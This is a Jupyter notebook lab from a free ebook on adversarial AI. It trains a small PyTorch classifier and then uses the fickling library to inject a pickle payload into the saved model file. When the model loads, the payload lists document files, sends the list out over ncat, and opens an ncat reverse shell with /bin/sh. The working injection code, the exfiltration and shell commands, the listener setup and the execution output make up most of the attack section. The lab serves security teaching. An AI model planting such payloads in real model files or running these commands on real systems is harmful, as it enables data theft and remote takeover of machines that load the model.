<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(fickling_neural_net.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Fickling Neural Nets  

Now that we understand this from a traditional machine learning perspective and we have had the experience of learning that this all has to do with the **__reduce__** method, let us try another toy dataset, this time looking at the issue from a Neural Network (Deep Learning) perspective. 

More importantly, rather than running commands to query the local host, we are going to jump ahead and setup a reverse shell, to give us access to device which is loading the model.


### Lab Objectives:  
- Extend our understanding of the pickle problem   
- Recognize that this is not just about traditional machine learning but also deep learning   
- Expand our knowledge with getting access to remote devices when they load the compromised model    


### Step 1:

In [1]:
# Import the libraries 
from sklearn.datasets import make_classification
import torch
import torch.nn as nn
import torch.nn.functional as F

In [2]:
### Version of key libraries used  
print(f'Torch version used:  {torch.__version__}')

Torch version used:  2.7.1+cu128


In [3]:
# Setup the device to work with
# This should ensure if there are accelerators in place, such as Apple backend or CUDA, 
# we should be able to take advantage of it.

if torch.cuda.is_available():
    print('Setting the device to cuda')
    device = 'cuda'
elif torch.backends.mps.is_available():
    print('Setting the device to Apple mps')
    device = 'mps'
else:
    print('Setting the device to CPU')
    device = torch.device('cpu')

Setting the device to cuda


In [4]:
# Create the toy dataset
X, y = make_classification(n_samples=100, n_classes=2, random_state=10)

# Take a sneak peak at the first 5 records of X and y
X[:5], y[:5]

(array([[-1.01767522, -2.39557201,  0.5039269 , -1.19420581, -0.36427809,
          0.26439469,  1.08522707, -0.14506454,  0.89256403,  0.18833121,
          0.20732957,  0.78108986,  0.88577486,  0.30866767,  0.35693907,
          0.0110227 , -0.85752252,  2.31912732, -0.86785291,  0.98007413],
        [-0.5864071 ,  0.73717898,  0.70387872, -0.73048734,  0.97055953,
          0.53348902,  0.00471054,  0.21855883,  0.56292179, -0.60498772,
         -0.46253912,  0.49881915,  0.52454074,  0.19212229,  0.14703394,
          0.62745097,  1.20290292, -0.25355802, -0.68472634, -0.33994862],
        [ 1.53291452, -0.56298605, -0.19748563,  1.20806065, -0.26513777,
          0.47868925, -1.17629904,  1.21411355, -0.48274742, -2.37675778,
         -1.76559325, -0.49683225,  1.19953434, -0.43228335,  0.43065099,
         -0.98142548, -0.31481729,  0.78499888, -1.26796367,  0.72482979],
        [-1.00174936,  0.86417055, -0.19682771, -0.88362438,  1.02783893,
          0.08498287, -0.4141195 , 

In [5]:
# Get the shape of the data
print(f'X.shape is: {X.shape}')
print(f'y.shape is: {y.shape}')

X.shape is: (100, 20)
y.shape is: (100,)


In [6]:
# To use this in our PyTorch neural network, 
# we need to convert these from numpy arrays to Pytorch tensors

print(f"X's data type before conversion is: {type(X)} -> {X.dtype}")
print(f"y's data type before conversion is: {type(y)} -> {y.dtype}")

print(f'\nConverting both X and y to PyTorch tensors ...')

# Convert these samples from numpy arrays to torch tensors
X = torch.tensor(data=X, dtype=torch.float32, device=device)
y = torch.tensor(data = y.reshape(-1, 1), dtype=torch.float32, device=device)

print(f"\nX's data type after conversion is: {type(X)} -> {X.dtype}")
print(f"y's data type after conversion is: {type(y)} -> {y.dtype}")


X's data type before conversion is: <class 'numpy.ndarray'> -> float64
y's data type before conversion is: <class 'numpy.ndarray'> -> int64

Converting both X and y to PyTorch tensors ...

X's data type after conversion is: <class 'torch.Tensor'> -> torch.float32
y's data type after conversion is: <class 'torch.Tensor'> -> torch.float32


### !Note:  
The network we are going to build is based on this architecture. However, we will have 20 input neurons, i.e features. However, This diagram below only has seven. This is simply because I was not able to add more layers in the playground. However, the concepts remains exactly the same once we pass the input layer. There is one hidden layer that has 8 neurons. Those 8 neurons are then connected to an output of one neuron. This will be a binary classification problem.  

<img style="max-width:40em; height:auto;" src="../graphics/tf_playground_neural_net.png"/>


### Step 2:  

In [7]:
# Create a simple torch network
class SimpleNet(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out

In [8]:
# Set a random seed so the parameters always start at the same place
torch.manual_seed(seed=10)

# Instantiate the model
simple_model = SimpleNet().to(device=device)

# Make predictions on the untrained model
untrained_preds = simple_model(X.to(device))

# Take a look at the first 10 records
untrained_preds[:10]

tensor([[0.5659],
        [0.4796],
        [0.5605],
        [0.5314],
        [0.5363],
        [0.5383],
        [0.5140],
        [0.5458],
        [0.5480],
        [0.4835]], device='cuda:0', grad_fn=<SliceBackward0>)

In [9]:
# Get the untrained model accuracy
# This suggest we have 50% accuracy via the untrained model
(untrained_preds.round() == y).sum() / y.size(dim=0) 

tensor(0.5000, device='cuda:0')

In [10]:
# Train the model, similar to what would happen in the real world
# Setup a loss function
loss_fn = nn.BCELoss()

# Setup the optimizer to handle gradient descent
optimizer = torch.optim.AdamW(params=simple_model.parameters(), lr=0.01)

# Set the number of epochs
num_epochs = 100

# Put the model in train model
simple_model.train(mode=True)

# Train the model
for epoch in range(num_epochs):
    # Clear the gradients
    for p in simple_model.parameters():
        p.grad = None

    # make the predictions
    preds = simple_model(X)
    loss = loss_fn(input=preds, target=y)

    # perform backpropagation
    loss.backward()

    # Perform gradient descent
    optimizer.step()

    # calculate the model accuracy
    accuracy = (y == preds.round()).sum()/y.size(dim=0)
    
    if epoch % 10 == 0:
        print(f'Epoch: {epoch+1}/{num_epochs} \taccuracy:{accuracy} \t loss:{loss}')

Epoch: 1/100 	accuracy:0.5 	 loss:0.7180083990097046
Epoch: 11/100 	accuracy:0.8100000023841858 	 loss:0.5911996960639954
Epoch: 21/100 	accuracy:0.8899999856948853 	 loss:0.45934081077575684
Epoch: 31/100 	accuracy:0.9300000071525574 	 loss:0.325526624917984
Epoch: 41/100 	accuracy:0.949999988079071 	 loss:0.22560203075408936
Epoch: 51/100 	accuracy:0.9799999594688416 	 loss:0.15741677582263947
Epoch: 61/100 	accuracy:0.9799999594688416 	 loss:0.11038202047348022
Epoch: 71/100 	accuracy:0.9899999499320984 	 loss:0.07750357687473297
Epoch: 81/100 	accuracy:0.9899999499320984 	 loss:0.05485496297478676
Epoch: 91/100 	accuracy:0.9899999499320984 	 loss:0.0392584502696991


In [11]:
# Save the model
# This is where Pytorch is using the Python's Pickle library to save the model
# Use the new zip file format to save the file
# This tells torch to save the model's state dictionary
# We could save the entire model with torch.save()
# However, that is not the recommended way to save your models
# This is one of the ways you should be saving your models in production
torch.save(obj=simple_model.state_dict(), f='/tmp/my_trusted_simple_model.pth', _use_new_zipfile_serialization=True)

# Validate the model has been created
!ls /tmp/my_trusted_simple_model.pth

# Validate the integrity of the model
!md5sum /tmp/my_trusted_simple_model.pth

/tmp/my_trusted_simple_model.pth
bb4316ec6d2bcbf0d9906352d9f56b49  /tmp/my_trusted_simple_model.pth


In [12]:
# Verify that the model can be loaded
# simple_model.load_state_dict(state_dict=torch.load(f=r'/tmp/my_trusted_simple_model.pth', weights_only=False))

### Step 3:   

In [13]:
# prepare to compromise the model

from fickling.pytorch import PyTorchModelWrapper
# https://github.com/trailofbits/fickling/blob/master/example/inject_pytorch.py
# https://hiddenlayer.com/innovation-hub/machine-learning-threat-roundup/  
# https://blog.trailofbits.com/2024/03/04/relishing-new-fickling-features-for-securing-ml-systems/

In [14]:
# Steal the model .... somehow :-)
# Or share a compromised model.
stolen_model = PyTorchModelWrapper('/tmp/my_trusted_simple_model.pth')
stolen_model

# Validate the model's integrity before compromising it
# This value is the same as above.
!md5sum /tmp/my_trusted_simple_model.pth

bb4316ec6d2bcbf0d9906352d9f56b49  /tmp/my_trusted_simple_model.pth


In [15]:
# Setup a variable with the commands to execute when the model loads
# Notice also, all the libraries we need are being loaded as part of the variable

COMPROMISE_CODE = """   
import os
import subprocess as sp

with open(file='/tmp/recon.txt', mode='wt') as recon_fp:
  recon_fp.write('Beginning Reconnaissance ....\\n')

  for file in os.listdir(path='/tmp/'):
    if file.endswith('.doc') or file.endswith('.xls'):
      recon_fp.write(f'{file}\\n')


  recon_fp.write('Ending Reconnaissance ...\\n')
  print('Exfiltrating ...')

# Exfiltrate the reconnaissance information
# Notice in this case, we are not using the --ssl option. 
# This is just so we understand the importance of encrypting our sessions
# Ensure you have a listener setup on the remote host:
#   $ ncat --verbose --listen 9999 --keep-open
sp.call(['ncat', '--verbose', '127.0.0.1', '9998'], stdin=open(file='/tmp/recon.txt', mode='rt'))

# Create the backdoor reverse shell
# Ensure you setup a netcat session on the remote host: 
#   $ ncat --verbose --listen 9999 --ssl --keep-open

# This is one way to do it
# We will use another way sooner, with built in tools rather than having to install ncat
sp.Popen(['ncat', '--verbose', '127.0.0.1', '9999', '--exec', '/bin/sh', '--ssl'])

"""

# We can run this cell to test the compromise code before using it
#exec(COMPROMISE_CODE)

# However, just like previously, we need to fix this up. We need to get all of this on oneline

In [16]:
# Compromise the stolen model
# We would have love to be able to do something like this
#stolen_model.inject_payload(COMPROMISE_CODE,  output_path='/tmp/new_torch.pt', injection='insertion', overwrite=True)

Instead we have to do below. If you find a cleaner way to solve this problem let me know. However, this is the same code as above without the comments. Notice I also am using two ports, one is 9998 and the other 9999. This is because we are performing two tasks at the same time. First we are exfiltrating the reconnaissance data and second, we are setting up the reverse shell.   
Notice the **--exec /bin/sh***   

Setup two listeners on your host:   
$ **ncat --verbose --listen 9999 --keep-open --ssl**   

$ **ncat --verbose --listen 9998  --keep-open**     


Create a few files   
$ touch test.doc
$ touch test1.doc
$ touch test2.doc
$ touch test3.doc
$
$ touch test.xls
$ touch test1.xls
$ touch test2.xls
$ touch test3.xls


In [17]:
# Inject the payload into the model
stolen_model.inject_payload(payload="""import os   \nimport subprocess as sp  \nwith open(file='/tmp/recon.txt', mode='wt') as recon_fp:  \n\trecon_fp.write('Beginning Reconnaissance ....\\n')    \n\tfor file in os.listdir(path='/tmp/'):    \n\t\tif file.endswith('.doc') or file.endswith('.xls'):  \n\t\t\trecon_fp.write(f'{file}\\n')  \n\trecon_fp.write('Ending Reconnaissance ...\\n')   \n\tprint('Exfiltrating ...')   \nsp.call(['ncat', '--verbose', '127.0.0.1', '9998'], stdin=open(file='/tmp/recon.txt', mode='rt'))    \nsp.Popen(['ncat', '--verbose', '127.0.0.1', '9999', '--exec', '/bin/sh', '--ssl'])   """, output_path='/tmp/new_torch.pt', injection='insertion', overwrite=True )

In [18]:
# We see below that the model's integrity has changed
!md5sum /tmp/my_trusted_simple_model.pth

43a7e92079c440401db38a63c4effad1  /tmp/my_trusted_simple_model.pth


In [19]:
# Because we stored the state dict, which is the recommended way of saving torch models, we need to reconstruct the model class
# This is not a problem as is exactly what you would do in production
# Note this is just one approach and there are other approaches, 
# such as saving the entire model with torch.save
# or even using torch.jit.export()
# We are going to stick with the recommended way

# Let's recreate the class
# In production we can just copy and paste this code
class SimpleNet(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out
    
# Instantiate the class again
simple_model = SimpleNet().to(device=device)
simple_model

SimpleNet(
  (layers): Sequential(
    (0): Linear(in_features=20, out_features=8, bias=True)
    (1): ReLU()
    (2): Linear(in_features=8, out_features=1, bias=True)
    (3): Sigmoid()
  )
)

# 
Remember to setup your nectat listener   
$ ncat --verbose --listen 9999 --ssl   

As always, let's also validate the our solution works outside of the notebook and can run independently of this hotebook   
Remember you need to be in your **labs** directory    
$ python load_model.py --model /tmp/my_trusted_simple_model.pth

Now when the user in the organization tries to use the mode ...   
Load/deserialize the model to prepare to make predictions.  Simply loading the model here will cause the malicious code to execute. 

Notice, this information is only being shown below, so we can see what is happening.  Realistically, we would go back to the COMPROMISE_CODE and remove the --verbose option

In [20]:
# Show that the loaded model can still make predictions
# First put the model in eval mode
#loaded_trusted_pwnd_model.eval()

# Make some predictions
#loaded_trusted_pwnd_model(X)[:10]
#loaded_trusted_pwnd_model

# Load up the model state dictionary
simple_model.load_state_dict(state_dict=torch.load(f=r'/tmp/my_trusted_simple_model.pth', weights_only=False, map_location=device))

Exfiltrating ...


Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection refused.
Ncat: Version 7.94SVN ( https://nmap.org/ncat )


<All keys matched successfully>

In [21]:
# As always, we still want to know that our model can make predictions
simple_model.eval()

# Make some predictions
simple_model(X)[:10]

tensor([[8.6402e-03],
        [6.1995e-02],
        [2.8719e-03],
        [9.1484e-01],
        [9.5764e-01],
        [9.9731e-01],
        [4.9077e-02],
        [1.1643e-04],
        [9.7802e-01],
        [9.9998e-01]], device='cuda:0', grad_fn=<SliceBackward0>)

In [None]:
# With the training finish clear the GPU cache
# Setup the device to work with
if torch.cuda.is_available():
    # For CUDA GPU
    print(f'Cleaning {device} cache')
    torch.cuda.empty_cache()
elif torch.backends.mps.is_available():
    # For Apple devices
    print(f'Cleaning {device} cache')
    torch.mps.empty_cache()
else:
    # Default to cpu
    pass

Cleaning cuda cache


Ncat: TIMEOUT.


# Lab Takeaways:   
- We extend our attacks against the pickle format towards neural nets   
- We learnt how to perform exfiltration via the models   
- We saw how we could setup a reverse shell by compromising the model   